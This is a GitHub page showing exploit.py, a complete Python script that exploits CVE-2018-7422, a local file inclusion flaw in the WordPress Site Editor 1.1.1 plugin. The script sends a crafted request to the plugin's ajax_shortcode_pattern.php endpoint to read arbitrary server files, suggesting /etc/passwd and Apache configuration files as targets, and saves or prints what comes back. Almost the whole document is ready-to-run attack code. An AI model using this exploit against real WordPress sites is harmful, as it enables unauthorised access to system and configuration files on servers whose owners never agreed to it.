-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
72 lines (60 loc) · 2.56 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/env python3
import argparse
import requests
from termcolor import colored
def print_message(message, type):
if type == 'SUCCESS':
print('[' + colored('SUCCESS', 'green') + '] ' + message)
elif type == 'INFO':
print('[' + colored('INFO', 'blue') + '] ' + message)
elif type == 'WARNING':
print('[' + colored('WARNING', 'yellow') + '] ' + message)
elif type == 'ALERT':
print('[' + colored('ALERT', 'yellow') + '] ' + message)
elif type == 'ERROR':
print('[' + colored('ERROR', 'red') + '] ' + message)
def get_normalized_url(url):
if url[-1] != '/':
url += '/'
if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
url = "http://" + url
return url
def get_proxy_protocol(url):
if url[0:8].lower() == 'https://':
return 'https'
return 'http'
def strip_last_line(original_string):
return original_string[:original_string.rfind('\n')]
parser = argparse.ArgumentParser(description='Exploit for CVE-2018-7422: Local File Inclusion in WordPress Plugin Site Editor 1.1.1')
parser.add_argument('TARGET', type=str,
help='Target Wordpress location (Example: http://localhost/wp/ or https://victim.xyz:8000/)')
parser.add_argument('FILE', type=str,
help='Filename to gather from LFI (Example: "/etc/passwd" or "/etc/apache2/sites-enabled/000-default.conf")')
parser.add_argument('-P','--proxy', type=str,
help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
parser.add_argument('-o','--outfile', type=str,
help='File to write results to (Example: "result.txt" or "/tmp/result.txt)')
args = parser.parse_args()
base_url = get_normalized_url(args.TARGET)
exploit_url = base_url + "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=" + args.FILE
if args.proxy:
proxy_url = get_normalized_url(args.proxy)
proxy_protocol = get_proxy_protocol(proxy_url)
proxies = { proxy_protocol: proxy_url }
else:
proxies = {}
request = requests.get(exploit_url, proxies=proxies)
response_raw = request.text
if "Error: didn't load shortcodes pattern file" in response_raw:
print_message("Likely attempting to retrieve non-existent file!", "ERROR")
exit()
elif response_raw.strip() == "":
print_message("File appears empty!", "WARNING")
print_message("Are you sure you have READ permissions on the file?", "INFO")
exit()
file_content = strip_last_line(response_raw)
if args.outfile:
with open(args.outfile, 'w') as file:
file.write(file_content)
else:
print(file_content)